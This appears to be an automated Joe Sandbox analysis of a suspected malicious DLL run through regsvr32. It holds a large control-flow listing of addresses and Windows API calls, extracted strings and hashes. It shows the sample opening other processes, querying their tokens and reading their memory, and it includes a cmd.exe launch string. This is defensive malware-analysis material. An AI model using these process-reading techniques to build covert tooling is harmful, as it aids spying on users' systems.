7ffdfb263220 7 API calls 35979->35994 35984 7ffdfb20a8d0 HeapAlloc 35981->35984 35982 7ffdfb263f1d 35983 7ffdfb302850 6 API calls 35982->35983 35985 7ffdfb263f25 35983->35985 35986 7ffdfb263eb1 35984->35986 35987 7ffdfb263efc 35986->35987 35988 7ffdfb263eb6 memcpy 35986->35988 35990 7ffdfb2dead0 72 API calls 35987->35990 35989 7ffdfb263ee0 35988->35989 35989->35928 35989->35989 35990->35979 35991->35939 35992->35946 35993->35976 35994->35982 35996 7ffdfb2b995e 35995->35996 35997 7ffdfb2b98f2 35995->35997 35996->35953 35997->35996 35998 7ffdfb2b9936 WaitOnAddress 35997->35998 35998->35997 35999 7ffdfb2b9955 GetLastError 35998->35999 35999->35997 36000->35954 36001->35959 36002->35966 36003->35966 36041 7ffdfb2b64b0 36004->36041 36007 7ffdfb28e72c 36007->35971 36008 7ffdfb28e827 SetLastError GetEnvironmentVariableW 36012 7ffdfb28e847 GetLastError 36008->36012 36013 7ffdfb28e734 36008->36013 36009 7ffdfb28e719 36015 7ffdfb20a8e0 HeapFree 36009->36015 36010 7ffdfb28e6dd 36010->36007 36010->36009 36014 7ffdfb20a8e0 HeapFree 36010->36014 36012->36013 36016 7ffdfb28e914 GetLastError 36012->36016 36013->36008 36017 7ffdfb28e860 GetLastError 36013->36017 36019 7ffdfb28e892 36013->36019 36054 7ffdfb27c430 72 API calls 36013->36054 36014->36009 36015->36007 36018 7ffdfb28e92c 36016->36018 36024 7ffdfb28e8f8 36016->36024 36017->36013 36026 7ffdfb28e9dd 36017->36026 36020 7ffdfb20a8e0 HeapFree 36018->36020 36021 7ffdfb28e89b 36019->36021 36019->36026 36020->36024 36055 7ffdfb29b9f0 36021->36055 36022 7ffdfb28e8fd 36022->36007 36028 7ffdfb20a8e0 HeapFree 36022->36028 36024->36022 36027 7ffdfb28e992 36024->36027 36030 7ffdfb20a8e0 HeapFree 36024->36030 36025 7ffdfb28e8aa 36025->36024 36032 7ffdfb20a8e0 HeapFree 36025->36032 36029 7ffdfb20a8e0 HeapFree 36026->36029 36034 7ffdfb28ea26 36026->36034 36031 7ffdfb20a8e0 HeapFree 36027->36031 36028->36007 36029->36034 36030->36027 36031->36022 36032->36024 36033 7ffdfb20a8e0 HeapFree 36033->36034 36034->36033 36035 7ffdfb28eaab 
36034->36035 36037 7ffdfb302850 6 API calls 36034->36037 36036 7ffdfb20a8e0 HeapFree 36035->36036 36038 7ffdfb28eac7 36036->36038 36037->36034 36039 7ffdfb302850 6 API calls 36038->36039 36040 7ffdfb28eacf 36039->36040 36040->35971 36042 7ffdfb2b64d5 36041->36042 36043 7ffdfb2b650f 36041->36043 36042->36043 36045 7ffdfb2b651f 36042->36045 36046 7ffdfb20a8d0 HeapAlloc 36042->36046 36044 7ffdfb2deab0 72 API calls 36043->36044 36043->36045 36044->36045 36071 7ffdfb2852c0 36045->36071 36046->36043 36049 7ffdfb2b65fc 36051 7ffdfb28e6d1 36049->36051 36075 7ffdfb27c120 72 API calls 36049->36075 36050 7ffdfb2b65d1 36050->36051 36053 7ffdfb20a8e0 HeapFree 36050->36053 36051->36010 36051->36013 36053->36051 36054->36013 36056 7ffdfb29ba3b 36055->36056 36057 7ffdfb29ba11 36055->36057 36058 7ffdfb2deab0 72 API calls 36056->36058 36059 7ffdfb20a8d0 HeapAlloc 36057->36059 36070 7ffdfb29ba40 36057->36070 36061 7ffdfb29bbf7 36058->36061 36060 7ffdfb29ba36 36059->36060 36060->36056 36060->36070 36062 7ffdfb29bc16 36061->36062 36064 7ffdfb20a8e0 HeapFree 36061->36064 36065 7ffdfb302850 6 API calls 36062->36065 36063 7ffdfb29bbc6 36063->36025 36064->36062 36067 7ffdfb29bc1e 36065->36067 36066 7ffdfb2a4840 72 API calls 36066->36070 36077 7ffdfb2abe80 72 API calls 36067->36077 36069 7ffdfb29bc3d 36069->36025 36070->36063 36070->36066 36074 7ffdfb2852f0 36071->36074 36072 7ffdfb285435 36072->36049 36072->36050 36074->36072 36076 7ffdfb27c430 72 API calls 36074->36076 36075->36051 36076->36072 36077->36069 36079 7ffdfb20bd53 36078->36079 36082 7ffdfb20bc92 36078->36082 36101 7ffdfb20af60 72 API calls 36079->36101 36081 7ffdfb20bcf4 memcpy 36081->36082 36083 7ffdfb20bd27 memcpy 36081->36083 36082->36079 36082->36081 36103 7ffdfb20ddf0 memcpy 36082->36103 36117 7ffdfb228200 36082->36117 36083->36082 36086 7ffdfb230ab0 36085->36086 36087 7ffdfb230ac1 36086->36087 36088 7ffdfb258a20 9 API calls 36086->36088 36092 7ffdfb230c50 36086->36092 36400 7ffdfb22f6c0 36087->36400 36090 7ffdfb230b03 
36088->36090 36090->36092 36093 7ffdfb230b2a 36090->36093 36091 7ffdfb230b8e 36091->35908 36094 7ffdfb302850 6 API calls 36092->36094 36096 7ffdfb230ba5 36093->36096 36097 7ffdfb230b36 36093->36097 36095 7ffdfb230ccc 36094->36095 36433 7ffdfb230460 162 API calls 36096->36433 36097->36087 36099 7ffdfb230bf9 36097->36099 36434 7ffdfb230920 162 API calls 36099->36434 36101->35906 36102->35908 36104 7ffdfb20e078 36103->36104 36105 7ffdfb20dea8 36103->36105 36257 7ffdfb222910 36104->36257 36105->36104 36112 7ffdfb20e00c 36105->36112 36113 7ffdfb20df6c GetProcessTimes 36105->36113 36110 7ffdfb21dbc0 103 API calls 36111 7ffdfb20e0f2 memcpy 36110->36111 36114 7ffdfb20e05e 36111->36114 36128 7ffdfb21dbc0 36112->36128 36116 7ffdfb20df9d 36113->36116 36114->36082 36116->36104 36116->36112 36118 7ffdfb2282a9 36117->36118 36125 7ffdfb228213 36117->36125 36119 7ffdfb2deab0 72 API calls 36118->36119 36121 7ffdfb22828f 36119->36121 36120 7ffdfb2282bf 36122 7ffdfb2deab0 72 API calls 36120->36122 36123 7ffdfb2deab0 72 API calls 36121->36123 36127 7ffdfb228296 36121->36127 36124 7ffdfb2282c4 36122->36124 36123->36120 36125->36120 36125->36121 36126 7ffdfb2280c0 2 API calls 36125->36126 36126->36121 36127->36083 36129 7ffdfb21dbe5 36128->36129 36135 7ffdfb21dcb6 36128->36135 36130 7ffdfb21dc98 GetSystemTimes 36129->36130 36131 7ffdfb21dc39 GetProcessTimes 36129->36131 36130->36135 36131->36130 36133 7ffdfb21dc66 36131->36133 36132 7ffdfb21de56 GetProcessIoCounters 36134 7ffdfb21de6b 36132->36134 36133->36130 36137 7ffdfb21e0d1 36134->36137 36140 7ffdfb21df24 OpenProcessToken 36134->36140 36135->36132 36135->36134 36136 7ffdfb21e1ac NtQueryInformationProcess 36139 7ffdfb21e1e9 36136->36139 36160 7ffdfb21e188 36136->36160 36137->36136 36137->36160 36138 7ffdfb21e5c6 36138->36114 36141 7ffdfb21e204 NtQueryInformationProcess 36139->36141 36191 7ffdfb21e2fb 36139->36191 36140->36137 36142 7ffdfb21df49 36140->36142 36146 7ffdfb21e22d 36141->36146 36141->36160 36142->36137 36147 7ffdfb21df5f 
GetTokenInformation 36142->36147 36143 7ffdfb21e343 ReadProcessMemory 36148 7ffdfb21e36d ReadProcessMemory 36143->36148 36143->36160 36144 7ffdfb21e531 memset 36333 7ffdfb243c60 36144->36333 36145 7ffdfb21e5b6 36145->36138 36155 7ffdfb20a8e0 HeapFree 36145->36155 36146->36143 36152 7ffdfb21e25e ReadProcessMemory 36146->36152 36146->36160 36150 7ffdfb21df94 GetProcessHeap 36147->36150 36165 7ffdfb21e04c 36147->36165 36148->36160 36169 7ffdfb21e39b 36148->36169 36153 7ffdfb21dfa8 HeapAlloc 36150->36153 36164 7ffdfb21e014 36150->36164 36151 7ffdfb21e558 GetModuleFileNameExW 36156 7ffdfb21e580 36151->36156 36157 7ffdfb21e285 ReadProcessMemory 36152->36157 36152->36160 36158 7ffdfb21dfc1 GetTokenInformation 36153->36158 36159 7ffdfb21e0c5 CloseHandle 36153->36159 36154 7ffdfb21e441 36166 7ffdfb21e7b2 VirtualQueryEx 36154->36166 36186 7ffdfb21e8ac 36154->36186 36155->36138 36171 7ffdfb29b9f0 72 API calls 36156->36171 36157->36160 36161 7ffdfb21e2b4 memcpy 36157->36161 36162 7ffdfb21dfe6 36158->36162 36163 7ffdfb21e097 36158->36163 36159->36137 36160->36138 36160->36144 36160->36145 36289 7ffdfb21fb40 36161->36289 36376 7ffdfb215080 73 API calls 36162->36376 36181 7ffdfb21e0b0 36163->36181 36164->36159 36179 7ffdfb21e03d 36164->36179 36165->36150 36165->36164 36172 7ffdfb21e873 36166->36172 36173 7ffdfb21e7d8 36166->36173 36169->36154 36170 7ffdfb21e3f9 36169->36170 36382 7ffdfb215d10 WaitOnAddress GetLastError 36169->36382 36177 7ffdfb21e6e2 36170->36177 36178 7ffdfb21e40a 36170->36178 36171->36145 36389 7ffdfb2246b0 HeapFree 36172->36389 36334 7ffdfb21f640 36173->36334 36176 7ffdfb21dff6 36183 7ffdfb21e648 36176->36183 36184 7ffdfb21e007 36176->36184 36185 7ffdfb21f640 75 API calls 36177->36185 36379 7ffdfb2246b0 HeapFree 36178->36379 36179->36159 36378 7ffdfb21d210 GetProcessHeap HeapFree 36181->36378 36188 7ffdfb21e67e 36183->36188 36189 7ffdfb21e66c 36183->36189 36377 7ffdfb21d210 GetProcessHeap HeapFree 36184->36377 36194 7ffdfb21e6f2 36185->36194 36186->36160 36200 
7ffdfb21f640 75 API calls 36186->36200 36187 7ffdfb21e7fb 36187->36172 36210 7ffdfb21e80f 36187->36210 36380 7ffdfb21d210 GetProcessHeap HeapFree 36188->36380 36195 7ffdfb20a8e0 HeapFree 36189->36195 36191->36143 36191->36160 36199 7ffdfb21e709 36194->36199 36383 7ffdfb21f480 36194->36383 36195->36188 36197 7ffdfb21e890 36197->36186 36206 7ffdfb20a8e0 HeapFree 36197->36206 36198 7ffdfb21e00f 36381 7ffdfb213b10 CloseHandle 36198->36381 36388 7ffdfb2246b0 HeapFree 36199->36388 36203 7ffdfb21ea86 36200->36203 36208 7ffdfb21ea9d 36203->36208 36218 7ffdfb21ead0 36203->36218 36204 7ffdfb21e425 36204->36154 36214 7ffdfb20a8e0 HeapFree 36204->36214 36206->36186 36207 7ffdfb21e73d 36207->36199 36216 7ffdfb20a8e0 HeapFree 36207->36216 36208->36160 36221 7ffdfb20a8e0 HeapFree 36208->36221 36215 7ffdfb20a8e0 HeapFree 36210->36215 36227 7ffdfb21e8c9 36210->36227 36211 7ffdfb21e6a8 36211->36137 36212 7ffdfb21e920 36212->36186 36220 7ffdfb20a8e0 HeapFree 36212->36220 36213 7ffdfb21e760 36213->36154 36217 7ffdfb20a8e0 HeapFree 36213->36217 36214->36154 36215->36210 36216->36199 36217->36154 36219 7ffdfb29b9f0 72 API calls 36218->36219 36222 7ffdfb21eb15 36219->36222 36220->36186 36221->36160 36390 7ffdfb21f360 74 API calls 36222->36390 36223 7ffdfb21e9c3 36224 7ffdfb21ec40 36223->36224 36226 7ffdfb20a8e0 HeapFree 36223->36226 36228 7ffdfb21eda3 36224->36228 36231 7ffdfb20a8e0 HeapFree 36224->36231 36226->36224 36227->36212 36227->36223 36230 7ffdfb29b9f0 72 API calls 36227->36230 36365 7ffdfb2285d0 36227->36365 36234 7ffdfb302850 6 API calls 36228->36234 36229 7ffdfb21eb4b 36232 7ffdfb21ebb0 36229->36232 36233 7ffdfb21eb50 36229->36233 36230->36227 36235 7ffdfb21ecfc 36231->36235 36236 7ffdfb21eb94 36232->36236 36239 7ffdfb20a8e0 HeapFree 36232->36239 36233->36236 36242 7ffdfb20a8e0 HeapFree 36233->36242 36237 7ffdfb21edab 36234->36237 36238 7ffdfb302850 6 API calls 36235->36238 36236->36160 36243 7ffdfb20a8e0 HeapFree 36236->36243 36245 7ffdfb21edd1 GetProcessTimes 36237->36245 
36246 7ffdfb21ee09 36237->36246 36241 7ffdfb21ed04 36238->36241 36239->36236 36244 7ffdfb21ed23 36241->36244 36247 7ffdfb20a8e0 HeapFree 36241->36247 36242->36236 36243->36160 36248 7ffdfb302850 6 API calls 36244->36248 36250 7ffdfb21ee02 36245->36250 36246->36114 36247->36244 36249 7ffdfb21ed43 36248->36249 36249->36228 36251 7ffdfb21ed77 36249->36251 36250->36114 36252 7ffdfb20a8e0 HeapFree 36251->36252 36253 7ffdfb21ed8b 36252->36253 36254 7ffdfb302850 6 API calls 36253->36254 36255 7ffdfb21ed93 36254->36255 36391 7ffdfb213b10 CloseHandle 36255->36391 36258 7ffdfb22292d 36257->36258 36259 7ffdfb222942 36257->36259 36260 7ffdfb29b9f0 72 API calls 36258->36260 36261 7ffdfb222947 36259->36261 36262 7ffdfb22298a 36259->36262 36268 7ffdfb20e093 36260->36268 36264 7ffdfb2229be 36261->36264 36265 7ffdfb22294d 36261->36265 36263 7ffdfb20a8d0 HeapAlloc 36262->36263 36266 7ffdfb2229a8 36263->36266 36267 7ffdfb2e0010 78 API calls 36264->36267 36269 7ffdfb20a8d0 HeapAlloc 36265->36269 36266->36268 36271 7ffdfb2deab0 72 API calls 36266->36271 36267->36268 36274 7ffdfb21d840 36268->36274 36270 7ffdfb22296b 36269->36270 36270->36268 36272 7ffdfb2deab0 72 API calls 36270->36272 36273 7ffdfb222a5d 36271->36273 36272->36266 36275 7ffdfb20e0bd 36274->36275 36278 7ffdfb21d86d 36274->36278 36275->36110 36276 7ffdfb21d930 GetProcessTimes 36279 7ffdfb21d965 36276->36279 36277 7ffdfb21d8c6 OpenProcess 36282 7ffdfb21d8e1 36277->36282 36278->36276 36278->36277 36280 7ffdfb20a8d0 HeapAlloc 36279->36280 36281 7ffdfb21d9d3 36280->36281 36281->36275 36283 7ffdfb2dead0 72 API calls 36281->36283 36282->36275 36282->36276 36284 7ffdfb21db38 36283->36284 36285 7ffdfb21dbab 36284->36285 36286 7ffdfb20a8e0 HeapFree 36284->36286 36287 7ffdfb302850 6 API calls 36285->36287 36286->36285 36288 7ffdfb21dbb3 36287->36288 36290 7ffdfb21e2e4 36289->36290 36291 7ffdfb21fb52 36289->36291 36308 7ffdfb21fd30 36290->36308 36291->36290 36292 7ffdfb21fb78 36291->36292 36392 7ffdfb215d10 WaitOnAddress 
GetLastError 36291->36392 36294 7ffdfb21fc27 36292->36294 36305 7ffdfb21fb85 36292->36305 36295 7ffdfb21f640 75 API calls 36294->36295 36296 7ffdfb21fc3a 36295->36296 36298 7ffdfb21fc47 36296->36298 36299 7ffdfb21f480 73 API calls 36296->36299 36297 7ffdfb21fbd2 36297->36290 36302 7ffdfb20a8e0 HeapFree 36297->36302 36301 7ffdfb21fcd2 36298->36301 36307 7ffdfb20a8e0 HeapFree 36298->36307 36300 7ffdfb21fc76 36299->36300 36300->36298 36306 7ffdfb20a8e0 HeapFree 36300->36306 36301->36290 36304 7ffdfb20a8e0 HeapFree 36301->36304 36302->36290 36303 7ffdfb20a8e0 HeapFree 36303->36305 36304->36290 36305->36297 36305->36303 36306->36298 36307->36298 36309 7ffdfb21fdfd 36308->36309 36310 7ffdfb21fd49 36308->36310 36309->36191 36310->36309 36311 7ffdfb21fd63 VirtualQueryEx 36310->36311 36312 7ffdfb21fd81 36311->36312 36316 7ffdfb21fdab 36311->36316 36313 7ffdfb21f640 75 API calls 36312->36313 36315 7ffdfb21fd9e 36313->36315 36314 7ffdfb21fde2 36314->36309 36317 7ffdfb20a8e0 HeapFree 36314->36317 36315->36316 36320 7ffdfb21fe19 36315->36320 36316->36314 36318 7ffdfb20a8e0 HeapFree 36316->36318 36317->36309 36318->36316 36319 7ffdfb21fea8 36319->36309 36322 7ffdfb20a8e0 HeapFree 36319->36322 36321 7ffdfb20a8e0 HeapFree 36320->36321 36326 7ffdfb21fe62 36320->36326 36321->36320 36322->36309 36323 7ffdfb21ff44 36324 7ffdfb21ffd6 36323->36324 36327 7ffdfb20a8e0 HeapFree 36323->36327 36325 7ffdfb21fff8 36324->36325 36328 7ffdfb20a8e0 HeapFree 36324->36328 36329 7ffdfb302850 6 API calls 36325->36329 36326->36319 36326->36323 36330 7ffdfb29b9f0 72 API calls 36326->36330 36332 7ffdfb2285d0 73 API calls 36326->36332 36327->36324 36328->36325 36331 7ffdfb220000 36329->36331 36330->36326 36332->36326 36333->36151 36335 7ffdfb21f77f 36334->36335 36336 7ffdfb21f66f 36334->36336 36337 7ffdfb2deab0 72 API calls 36335->36337 36336->36335 36338 7ffdfb20a8d0 HeapAlloc 36336->36338 36339 7ffdfb21f78a 36337->36339 36340 7ffdfb21f6a8 36338->36340 36341 7ffdfb20a8e0 HeapFree 36339->36341 
36340->36335 36342 7ffdfb21f6b1 ReadProcessMemory 36340->36342 36343 7ffdfb21f79e 36341->36343 36348 7ffdfb21f6dc 36342->36348 36344 7ffdfb302850 6 API calls 36343->36344 36347 7ffdfb21f7a6 36344->36347 36345 7ffdfb21f6e3 36345->36187 36346 7ffdfb20a8e0 HeapFree 36346->36345 36349 7ffdfb21f821 36347->36349 36350 7ffdfb21f640 74 API calls 36347->36350 36348->36345 36348->36346 36349->36187 36351 7ffdfb21f85b 36350->36351 36352 7ffdfb21f865 36351->36352 36354 7ffdfb21f889 36351->36354 36352->36349 36353 7ffdfb20a8e0 HeapFree 36352->36353 36353->36349 36355 7ffdfb29b9f0 72 API calls 36354->36355 36356 7ffdfb21f8c6 36355->36356 36393 7ffdfb21f360 74 API calls 36356->36393 36358 7ffdfb21f8f4 36359 7ffdfb21f93e 36358->36359 36360 7ffdfb21f8f9 36358->36360 36361 7ffdfb21f929 36359->36361 36362 7ffdfb20a8e0 HeapFree 36359->36362 36360->36361 36363 7ffdfb20a8e0 HeapFree 36360->36363 36361->36349 36364 7ffdfb20a8e0 HeapFree 36361->36364 36362->36361 36363->36361 36364->36349 36366 7ffdfb228673 36365->36366 36371 7ffdfb2285e3 36365->36371 36367 7ffdfb2deab0 72 API calls 36366->36367 36369 7ffdfb228659 36367->36369 36368 7ffdfb228689 36370 7ffdfb2deab0 72 API calls 36368->36370 36372 7ffdfb2deab0 72 API calls 36369->36372 36375 7ffdfb228660 36369->36375 36373 7ffdfb22868e 36370->36373 36371->36368 36371->36369 36394 7ffdfb2280c0 36371->36394 36372->36368 36375->36227 36376->36176 36377->36198 36378->36159 36379->36204 36380->36198 36381->36211 36382->36170 36385 7ffdfb21f4a2 36383->36385 36384 7ffdfb21f54d 36384->36207 36385->36384 36386 7ffdfb29b9f0 72 API calls 36385->36386 36387 7ffdfb2285d0 73 API calls 36385->36387 36386->36385 36387->36385 36388->36213 36389->36197 36390->36229 36391->36228 36392->36292 36393->36358 36395 7ffdfb2280f0 36394->36395 36397 7ffdfb2280d7 36394->36397 36396 7ffdfb22810a 36395->36396 36398 7ffdfb20a8d0 HeapAlloc 36395->36398 36396->36369 36397->36395 36399 7ffdfb2280ee RtlReAllocateHeap 36397->36399 36398->36396 36399->36395 36401 7ffdfb22f77d 
36400->36401 36403 7ffdfb22f78b 36400->36403 36482 7ffdfb217ea0 93 API calls 36401->36482 36404 7ffdfb22f818 36403->36404 36483 7ffdfb260d70 36403->36483 36405 7ffdfb228be0 162 API calls 36404->36405 36412 7ffdfb22f87a 36405->36412 36407 7ffdfb22f96e 36407->36091 36409 7ffdfb22f9a4 36464 7ffdfb231c90 36409->36464 36412->36409 36413 7ffdfb22f93b 36412->36413 36414 7ffdfb22f91a 36412->36414 36435 7ffdfb217ce0 36412->36435 36439 7ffdfb218140 36412->36439 36413->36407 36487 7ffdfb231960 HeapFree 36413->36487 36414->36413 36451 7ffdfb25a730 36414->36451 36416 7ffdfb22fade 36418 7ffdfb302850 6 API calls 36416->36418 36419 7ffdfb22fafb 36418->36419 36421 7ffdfb22fbdb 36419->36421 36488 7ffdfb217ea0 93 API calls 36419->36488 36422 7ffdfb260d70 8 API calls 36421->36422 36430 7ffdfb22fc68 36421->36430 36422->36430 36423 7ffdfb22fd8b 36489 7ffdfb2325d0 7 API calls 36423->36489 36424 7ffdfb217ce0 93 API calls 36424->36430 36426 7ffdfb22fe24 36426->36091 36427 7ffdfb22fe67 36490 7ffdfb231f70 7 API calls 36427->36490 36428 7ffdfb218140 90 API calls 36428->36430 36430->36423 36430->36424 36430->36427 36430->36428 36431 7ffdfb22fd6a 36430->36431 36431->36423 36432 7ffdfb25a730 162 API calls 36431->36432 36432->36423 36433->36091 36434->36091 36436 7ffdfb217d4e 36435->36436 36437 7ffdfb217d03 36435->36437 36436->36412 36437->36436 36491 7ffdfb217ea0 93 API calls 36437->36491 36440 7ffdfb218159 36439->36440 36441 7ffdfb263090 2 API calls 36440->36441 36447 7ffdfb21815e 36440->36447 36442 7ffdfb21816f 36441->36442 36444 7ffdfb262e00 74 API calls 36442->36444 36445 7ffdfb218177 36444->36445 36445->36447 36508 7ffdfb264290 85 API calls 36445->36508 36492 7ffdfb218280 36447->36492 36448 7ffdfb21821b 36448->36412 36449 7ffdfb2181aa 36449->36448 36509 7ffdfb264290 85 API calls 36449->36509 36452 7ffdfb25a74d 36451->36452 36453 7ffdfb25a8b7 36451->36453 36452->36453 36456 7ffdfb25a7e8 36452->36456 36459 7ffdfb260d70 8 API calls 36452->36459 36460 7ffdfb28c220 SwitchToThread 36452->36460 
36513 7ffdfb25ac30 36452->36513 36517 7ffdfb25b310 36452->36517 36530 7ffdfb25a950 36452->36530 36539 7ffdfb234cbb 36452->36539 36583 7ffdfb23597e 36452->36583 36594 7ffdfb260a80 11 API calls 36452->36594 36453->36413 36458 7ffdfb260d70 8 API calls 36456->36458 36458->36453 36459->36452 36460->36452 36465 7ffdfb231cab 36464->36465 36468 7ffdfb231d66 36464->36468 36466 7ffdfb228be0 162 API calls 36465->36466 36467 7ffdfb231ce2 36466->36467 36469 7ffdfb231d57 36467->36469 36472 7ffdfb231d2d 36467->36472 36476 7ffdfb231cef 36467->36476 36471 7ffdfb20a8e0 HeapFree 36468->36471 36481 7ffdfb231d9f 36468->36481 36469->36407 36470 7ffdfb302850 6 API calls 36474 7ffdfb231db9 36470->36474 36473 7ffdfb231d8c 36471->36473 36472->36469 36477 7ffdfb20a8e0 HeapFree 36472->36477 36475 7ffdfb302850 6 API calls 36473->36475 36478 7ffdfb231d94 36475->36478 36476->36469 36713 7ffdfb227b90 HeapFree 36476->36713 36477->36469 36714 7ffdfb233c00 HeapFree 36478->36714 36481->36470 36482->36403 36484 7ffdfb260d7d 36483->36484 36485 7ffdfb260dab 36483->36485 36484->36485 36715 7ffdfb260dc0 8 API calls 36484->36715 36485->36404 36487->36416 36488->36421 36489->36426 36490->36426 36491->36436 36493 7ffdfb21828b 36492->36493 36494 7ffdfb263090 2 API calls 36493->36494 36500 7ffdfb218290 36493->36500 36495 7ffdfb21830a 36494->36495 36497 7ffdfb262e00 74 API calls 36495->36497 36496 7ffdfb2182a9 36496->36449 36498 7ffdfb218312 36497->36498 36498->36500 36501 7ffdfb21832b 36498->36501 36500->36496 36511 7ffdfb2184b0 88 API calls 36500->36511 36501->36496 36510 7ffdfb264290 85 API calls 36501->36510 36502 7ffdfb2183e1 36503 7ffdfb218408 36502->36503 36512 7ffdfb264290 85 API calls 36502->36512 36505 7ffdfb302850 6 API calls 36503->36505 36507 7ffdfb218429 36505->36507 36508->36447 36509->36448 36510->36496 36511->36502 36512->36503 36514 7ffdfb25ac9e 36513->36514 36515 7ffdfb25ac53 36513->36515 36514->36452 36515->36514 36595 7ffdfb25adf0 97 API calls 36515->36595 36596 7ffdfb25ba70 36517->36596 
36520 7ffdfb263090 2 API calls 36521 7ffdfb25b33f 36520->36521 36523 7ffdfb262e00 74 API calls 36521->36523 36524 7ffdfb25b347 36523->36524 36527 7ffdfb25b32e 36524->36527 36642 7ffdfb264290 85 API calls 36524->36642 36526 7ffdfb25b3eb 36526->36452 36625 7ffdfb25b8c0 36527->36625 36528 7ffdfb25b37a 36528->36526 36643 7ffdfb264290 85 API calls 36528->36643 36531 7ffdfb25ac30 97 API calls 36530->36531 36533 7ffdfb25a972 36531->36533 36532 7ffdfb25b310 94 API calls 36532->36533 36533->36532 36534 7ffdfb25a9a6 36533->36534 36537 7ffdfb25aab6 36533->36537 36534->36537 36538 7ffdfb25aa8b 36534->36538 36649 7ffdfb25db50 94 API calls 36534->36649 36537->36452 36538->36537 36650 7ffdfb25b670 HeapFree SwitchToThread 36538->36650 36540 7ffdfb234cc0 36539->36540 36541 7ffdfb228be0 162 API calls 36540->36541 36543 7ffdfb234e4d 36540->36543 36542 7ffdfb234d3a 36541->36542 36544 7ffdfb234dc8 36542->36544 36546 7ffdfb234d9d 36542->36546 36547 7ffdfb234d5c 36542->36547 36545 7ffdfb20a8e0 HeapFree 36543->36545 36550 7ffdfb234e73 36543->36550 36544->36543 36549 7ffdfb234dec 36544->36549 36545->36550 36546->36544 36551 7ffdfb20a8e0 HeapFree 36546->36551 36547->36544 36651 7ffdfb227b90 HeapFree 36547->36651 36548 7ffdfb234e3b 36548->36452 36549->36548 36652 7ffdfb2189c0 HeapFree 36549->36652 36552 7ffdfb302850 6 API calls 36550->36552 36551->36544 36555 7ffdfb234ef3 36552->36555 36556 7ffdfb234f95 36555->36556 36557 7ffdfb235047 36555->36557 36559 7ffdfb234f97 36555->36559 36560 7ffdfb234f8c 36555->36560 36556->36557 36563 7ffdfb234fe6 36556->36563 36558 7ffdfb20a8e0 HeapFree 36557->36558 36564 7ffdfb23506d 36557->36564 36558->36564 36559->36556 36566 7ffdfb20a8e0 HeapFree 36559->36566 36653 7ffdfb2296b0 36560->36653 36562 7ffdfb235035 36562->36452 36563->36562 36658 7ffdfb2189c0 HeapFree 36563->36658 36565 7ffdfb302850 6 API calls 36564->36565 36569 7ffdfb2350e5 36565->36569 36566->36556 36568 7ffdfb2352c2 36570 7ffdfb235334 36568->36570 36702 7ffdfb2189c0 HeapFree 36568->36702 
                                                                    [Control-flow graph node/edge listing (continued from the previous graph); the blocks in this listing call HeapAlloc, HeapFree, RtlFreeHeap, TlsGetValue, TlsSetValue, WaitOnAddress, GetLastError, NtQuerySystemInformation, CloseHandle and memcpy]
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
                                                                    • String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$PATHstd\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
                                                                    • API String ID: 3975177916-1077193248
                                                                    • Opcode ID: ba1096540c7540645495dfa36d7aae2386e001769c8719bd2c118a7c909b1bde
                                                                    • Instruction ID: 21bf385a0898185ac14a2bd794c1e083d290b1d1ed0715c96a6c14040f8690c6
                                                                    • Opcode Fuzzy Hash: ba1096540c7540645495dfa36d7aae2386e001769c8719bd2c118a7c909b1bde
                                                                    • Instruction Fuzzy Hash: 8573A862B1AAD389EB709F25D8607F92760FB04789F448135CE6D9BBEDDF3892418700
                                                                    APIs
                                                                    Strings
                                                                    • Unable to read process memory informationReadProcessMemory returned unexpected number of bytes readUnable to read process dataC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.0\src\windows\process.rs, xrefs: 00007FFDFB21E873
                                                                    • ), xrefs: 00007FFDFB21E87F
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Process$InformationMemoryQueryRead$TimesToken$HeapVirtual$AllocCloseCountersFileHandleModuleNameOpenSystemmemcpymemset
